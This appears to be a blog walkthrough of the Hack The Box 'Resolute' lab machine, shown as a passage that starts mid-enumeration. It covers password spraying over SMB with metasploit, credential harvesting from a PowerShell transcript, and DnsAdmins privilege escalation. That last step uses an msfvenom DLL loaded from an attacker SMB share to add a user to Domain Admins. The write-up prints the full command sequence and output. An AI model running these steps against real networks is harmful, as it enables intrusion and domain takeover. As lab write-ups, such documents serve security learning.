index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: <span class="o">(</span>null<span class="o">)</span> Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: <span class="o">(</span>null<span class="o">)</span> Desc: Built-in account <span class="k">for </span>guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: <span class="o">(</span>null<span class="o">)</span> Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password <span class="nb">set </span>to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
</code></pre></div></div>
<p>enum4linux generates a lot of information. Under <code class="language-plaintext highlighter-rouge">Users</code> we find an interesting description for the user Marko:</p>
<blockquote>
<p>Desc: Account created. Password set to Welcome123!</p>
</blockquote>
<p>If we try logging into the SMB service as Marko it fails. We can assume that Welcome123! is used as a default password by a lazy admin, so lets try it against all of the users. An easy way to do this is to use the auxiliary/scanner/smb/smb_login module in metasploit.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf5 <span class="o">></span> use auxiliary/scanner/smb/smb_login
<span class="o">[</span><span class="k">*</span><span class="o">]</span> 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\userlist::Welcome123!'</span>,
<span class="o">[!]</span> 10.10.10.169:445 - No active DB <span class="nt">--</span> Credential data will not be saved!
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\Administrator:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\Guest:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\krbtgt:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\DefaultAccount:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\ryan:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\marko:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\sunita:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\abigail:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\marcus:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\sally:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\fred:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\angela:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\felicia:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\gustavo:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\ulf:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\stevie:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\claire:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\paulo:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\steve:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\annette:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\annika:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\per:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\claude:Welcome123!'</span>,
<span class="o">[</span>+] 10.10.10.169:445 - 10.10.10.169:445 - Success: <span class="s1">'megabank\melanie:Welcome123!'</span>
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\zach:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\simon:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\naoki:Welcome123!'</span>,
<span class="o">[</span><span class="k">*</span><span class="o">]</span> 10.10.10.169:445 - Scanned 1 of 1 hosts <span class="o">(</span>100% <span class="nb">complete</span><span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Auxiliary module execution completed
</code></pre></div></div>
<p>We get a hit! The user Melanie is using the default password.</p>
<p>We can now use ldapdomaindump as an authenticated user to learn more about the system.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>❯ ldapdomaindump <span class="nt">-u</span> megabank<span class="se">\m</span>elanie 10.10.10.169
Password:
<span class="o">[]</span> Connecting to host...
<span class="o">[]</span> Binding to host
<span class="o">[</span>+] Bind OK
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Starting domain dump
<span class="o">[</span>+] Domain dump finished
</code></pre></div></div>
<p>This outputs a number of files, the USER file gives us more info about the users and which groups they are members of.
Melanie is in the Remote Management Users group, which means we should be able to use evil-winrm to login as Melanie. Also of interest is the user ryan who is a member of the Contractors group, which is in turn a member of DnsAdmins and Remote Management Users.</p>
<p>Lets login as Melanie.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>evil-winrm <span class="nt">-i</span> 10.10.10.169 <span class="nt">-u</span> melanie <span class="nt">-p</span> Welcome123!
</code></pre></div></div>
<p>Navigate to C:\Users\Melanie\Desktop\user.txt for the user flag.</p>
<h3 id="privesc">PrivEsc</h3>
<p>I tried running winPEAS but this didn’t return anything useful.
After looking around the filesystem I eventually found a hidden directory C:\PSTranscripts
To see hidden files in Powershell use:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ChildItem <span class="nt">-Force</span>
</code></pre></div></div>
<p>In this directory there is a log file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
</code></pre></div></div>
<p>A number of lines contain a password Serv3r4Admin4cc123! associated with the ryan user account.
We already know from ldapdomaindump that ryan is a member of Remote Management Users, so lets log in as ryan.
We also know that ryan is a member of DnsAdmins, meaning that ryan has access to the dnscmd command. We can use this to get root access by injecting a malicious dns.dll</p>
<p>Our dns.dll file will be run with admin privileges so we could use a reverse shell, however i found that this was not stable, perhaps due to windows defender. Another option is to add a user to the Domain Admins group.
So lets use msfvenom to craft a malicious dns.dll that will add melanie to Domain Admins.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom <span class="nt">-p</span> windows/x64/exec <span class="nv">CMD</span><span class="o">=</span><span class="s1">'net group "domain admins" melanie /add /domain'</span> <span class="nt">-f</span> dll <span class="o">></span> dns.dll
</code></pre></div></div>
<p>Windows Defender removes the file if you transfer it to the local machine so we will have to host it on a SMB share.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>smbserver.py <span class="nt">-debug</span> smb ./
</code></pre></div></div>
<p>Now as ryan we can run the following command to change the serverlevelplugindll to our malicious file.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dnscmd RESOLUTE /config /serverlevelplugindll <span class="se">\\</span>10.10.14.35<span class="se">\\</span>smb<span class="se">\\</span>dns.dll
</code></pre></div></div>
<p>Then we must restart dns for our code to be run.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc.exe stop dns
sc.exe start dns
</code></pre></div></div>
<p>If all has gone well melanie should now be a member of the Domain Admins group. If we log back in as melanie we can read the root.txt flag</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>melanie: cat C:/Users/Administrator/Desktop/root.txt
</code></pre></div></div>John McEwanLets start by running nmap. There is no website running on port 80, this machine is going to be entirely Active Directory.